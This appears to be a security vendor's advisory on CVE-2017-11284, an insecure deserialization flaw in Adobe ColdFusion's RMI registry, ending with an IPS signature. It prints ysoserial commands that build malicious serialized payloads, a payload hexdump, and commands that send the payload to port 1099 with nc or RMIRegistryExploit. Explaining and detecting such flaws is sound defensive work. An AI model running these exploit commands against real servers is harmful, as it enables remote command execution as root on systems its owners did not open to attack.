Adobe ColdFusion RMI Registry Insecure Deserialization Vulnerability
Adobe ColdFusion is a popular application development platform. A vulnerability CVE-2017-11284 has been reported in Adobe ColdFusion. Due to the lack of input validation on objects in the RMI Registry before deserialization, an attacker could execute arbitrary commands under the root privilege. The Adobe Systems ColdFusion 11 prior to update 13, and Adobe Systems ColdFusion 2016 release prior to update 5 are affected by this vulnerability.
Java supports a feature called serialization, which allows Java objects to be packed into a byte stream, and be deserializing by another Java application (such as applet). The methods of readObject() and writeObject() from Serializable interface are used for serializing and deserializing.
The Java Remote Method Invocation (RMI) is a service that supports the cross-JVM method calls. It by default listens on port 1099. When the serialized data are received in the request for the RMI service of Adobe ColdFusion, an attacker could include malicious data to call an exploitable library in the code path, triggering a remote code execution vulnerability.
To exploit this vulnerability, a payload of malicious serialized object is needed. There is an open-souced Proof-of-Concept tool called "ysoserial", which can generate such payloads, lowered the bar for an exploit:
$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat ... 0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov 0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride.......... 0000570: 0078 7071 007e 003a .xpq.~.: $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin $ nc 10.10.10.10 1099 < groovypayload.bin $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
SonicWall has developed the following signature to identify and stop the attacks:
- IPS 13048: Adobe ColdFusion RMI Registry Insecure Deserialization